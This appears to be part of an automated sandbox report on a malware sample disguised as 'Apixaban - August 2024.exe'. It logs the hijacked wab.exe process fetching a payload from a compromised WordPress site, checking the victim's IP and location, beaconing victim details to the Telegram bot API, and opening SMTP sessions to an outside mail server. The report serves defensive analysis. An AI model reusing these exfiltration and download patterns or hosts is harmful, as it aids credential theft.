                                              Connection: Keep-Alive
Jul 25, 2024 10:06:13.794564962 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:13 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a06baee768e743f5938963a929faed96
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
5  192.168.2.8  49722  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:06:14.401153088 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
Jul 25, 2024 10:06:17.073066950 CEST  730  IN  HTTP/1.1 502 Bad Gateway
                                              Date: Thu, 25 Jul 2024 08:06:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 547
                                              Connection: keep-alive
                                              X-Request-ID: b98c18767f52e37cfea8e0893dc2d0b8
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                              Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
6  192.168.2.8  49723  193.122.6.168  80  1372  C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp  Bytes transferred  Direction  Data
Jul 25, 2024 10:06:17.104306936 CEST  151  OUT  GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
Jul 25, 2024 10:06:19.733266115 CEST  320  IN  HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 7f463481024e7485b25aabfafcffa416
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              7          | 192.168.2.8 | 49725       | 193.122.6.168  | 80               | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp                            | Bytes transferred | Direction | Data
                                              Jul 25, 2024 10:06:20.353204012 CEST | 151               | OUT       | GET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:23.382668972 CEST | 320               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: b0274fd9894dcd08f3a40c2bcd63b092
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                              0          | 192.168.2.8 | 49710       | 108.167.181.251 | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:05:55 UTC | 202               | OUT       | GET /wp-includes/yPrtLahZfwrl128.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: www.reap.skyestates.com.mt
                                              Cache-Control: no-cache
                                              2024-07-25 08:05:56 UTC | 249               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:05:56 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Tue, 23 Jul 2024 06:10:07 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 277056
                                              Content-Type: application/octet-stream


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              1          | 192.168.2.8 | 49712       | 188.114.96.3   | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:01 UTC | 84                | OUT       | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:01 UTC | 706               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:01 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23484
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MG9GiZQ34rJjOYBeYh8lrhOFp1oletlSdzAnuFmLt34TGSvyvhNqiboH3Lq%2FeSK3bmp8SKEiuMMDVO%2Bll7aSs11gSC2HLQmBOS19hW0hafcGo%2FfpiNAoDcwOmsApTo6XKfX0iGBn"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa5f21f1e4213-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:01 UTC | 340               | IN        | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:01 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              2          | 192.168.2.8 | 49713       | 188.114.96.3   | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:04 UTC | 60                | OUT       | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-25 08:06:04 UTC | 712               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:04 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23487
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cT1fgqbtDpv1Bmeh5%2F5Ucq1wAjz1jGY6x%2BvVnottmLpLBvPsm4oXKZFYJnvZOQHi%2F19cWBaYVJ9V2%2FLAL%2FVR8QgqlnnHQcNxd%2ByYqCI93NzSXK1CQjdC4b0AnzKijzW3PH4uFbJY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa606691c1916-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:04 UTC | 340               | IN        | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:04 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              3          | 192.168.2.8 | 49715       | 188.114.96.3   | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:06 UTC | 84                | OUT       | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:06 UTC | 704               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:06 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23489
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RtXLQQAjB2ieeSGXSdHt6ED65hYGnyx9eSlXCTaHVx6zy2HCJnVsAUWzHU7VuMRT8trg41aKFhDYCJy1Pi%2BJyXPOkvh0OMED89x%2Fv3IJsY0Cln44ouw40eUeSE57HKwwADrRPNXf"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa610adcd1889-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:06 UTC | 340               | IN        | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:06 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              4          | 192.168.2.8 | 49717       | 188.114.96.3   | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:07 UTC | 84                | OUT       | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:07 UTC | 714               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:07 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23490
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=20uD79R3pgzFRO3rNSx892btThgdUetcWRuQmu5PTOTVPkSEbkvlH0iI5Q3i%2BL2a%2BXP%2B0hYJIqvLWR%2FKTURdVLkOO%2BrCO7YnVBkopM8QF0f%2FqXRSzJtQImmqFALRfLLI%2B297sxyC"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa618bf3e5e80-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:07 UTC | 340               | IN        | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:07 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              5          | 192.168.2.8 | 49719       | 188.114.96.3   | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:12 UTC | 84                | OUT       | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:12 UTC | 706               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:12 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23495
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sdMQRYaSm5Aqklxd4%2BWK0EEWF3cs1El1pqM2QxYXhtotUeC5be0Q0mwxZTP0yssiSVdy5GqExwTATA2sFZ%2FbSB3ZSzSPzSGD%2BoNb3fSFVNW6ibKlZXpHHYwm7pfPoo5bBUlCdIOE"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa639e9304350-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:12 UTC | 340               | IN        | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:12 UTC | 5                 | IN        | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                              6          | 192.168.2.8 | 49721       | 188.114.96.3   | 443              | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp               | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:14 UTC | 84                | OUT       | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:14 UTC | 710               | IN        | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:14 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23497
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XUvtwBv5RR90dRMk%2BHnXiU%2FGPRWNiTAaOI4654h6fN7MUfkPeWS83IvZLf9N1a3XGw%2F2wFaNbYNUOCh7iKL84IhR8C%2BQZvA8RlhoENC7UIuT0K7s6eOqOnkqT97BDXQjDWCaI%2Fv6"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa64388c60f5d-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:14 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              7 | 192.168.2.8 | 49724 | 188.114.96.3 | 443 | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:20 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:20 UTC | 708 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:20 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23503
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRRSuwKOrizSETcQg22NLk4F8raCkX%2Bqki9CpOm5qywiwOIjmy96TAqoHTgeqeJmjZcZM%2F43nYJ0Q0wlVcFcHdpBhU7d%2BpMTS8vdTvQhsXYPPq0rTxJkBb%2BmJQwJUaz6O9EDYsfC"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa668ce9243bb-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:20 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.8 | 49726 | 188.114.96.3 | 443 | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:23 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-07-25 08:06:24 UTC | 714 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:23 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 23506
                                              Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I44fdSxFmVx79s%2BlKmegJNdhDoM4HI%2FrkB63uROh8BSZwErw2eaa%2Bq6DSXY%2FOh2DjVA2fLtrBV09PwZH49H9YMzpyn8eizI0shf%2BCsZXUI154gSeQ%2F32rjb9YW7Bm%2FVOLDd3p0uY"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a8aa67fbe7b8ce9-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              2024-07-25 08:06:24 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-07-25 08:06:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.8 | 49727 | 149.154.167.220 | 443 | 1372 | C:\Program Files (x86)\Windows Mail\wab.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-07-25 08:06:24 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2026/07/2024%20/%2003:56:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-07-25 08:06:24 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 25 Jul 2024 08:06:24 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-07-25 08:06:24 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                              Jul 25, 2024 10:06:32.061460972 CEST | 587 | 49728 | 192.185.142.133 | 192.168.2.8 | 220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:06:31 -0500
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Jul 25, 2024 10:06:32.061825037 CEST | 49728 | 587 | 192.168.2.8 | 192.185.142.133 | EHLO 061544
                                              Jul 25, 2024 10:06:32.180141926 CEST | 587 | 49728 | 192.185.142.133 | 192.168.2.8 | 250-joyce.websitewelcome.com Hello 061544 [8.46.123.33]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Jul 25, 2024 10:06:32.180402040 CEST | 49728 | 587 | 192.168.2.8 | 192.185.142.133 | STARTTLS
                                              Jul 25, 2024 10:06:32.299238920 CEST | 587 | 49728 | 192.185.142.133 | 192.168.2.8 | 220 TLS go ahead
                                              Jul 25, 2024 10:06:35.852786064 CEST | 587 | 49729 | 192.185.142.133 | 192.168.2.8 | 220-joyce.websitewelcome.com ESMTP Exim 4.96.2 #2 Thu, 25 Jul 2024 03:06:35 -0500
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Jul 25, 2024 10:06:35.852926016 CEST | 49729 | 587 | 192.168.2.8 | 192.185.142.133 | EHLO 061544
                                              Jul 25, 2024 10:06:35.995678902 CEST | 587 | 49729 | 192.185.142.133 | 192.168.2.8 | 250-joyce.websitewelcome.com Hello 061544 [8.46.123.33]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
                                              Jul 25, 2024 10:06:35.995861053 CEST | 49729 | 587 | 192.168.2.8 | 192.185.142.133 | STARTTLS
                                              Jul 25, 2024 10:06:36.114645958 CEST | 587 | 49729 | 192.185.142.133 | 192.168.2.8 | 220 TLS go ahead


                                              Target ID:0
                                              Start time:04:04:30
                                              Start date:25/07/2024
                                              Path:C:\Users\user\Desktop\Apixaban - August 2024.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\Apixaban - August 2024.exe"
                                              Imagebase:0x400000
                                              File size:852'456 bytes
                                              MD5 hash:0E198C53CE387336130BE0C8AD27B7AF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:04:04:33
                                              Start date:25/07/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
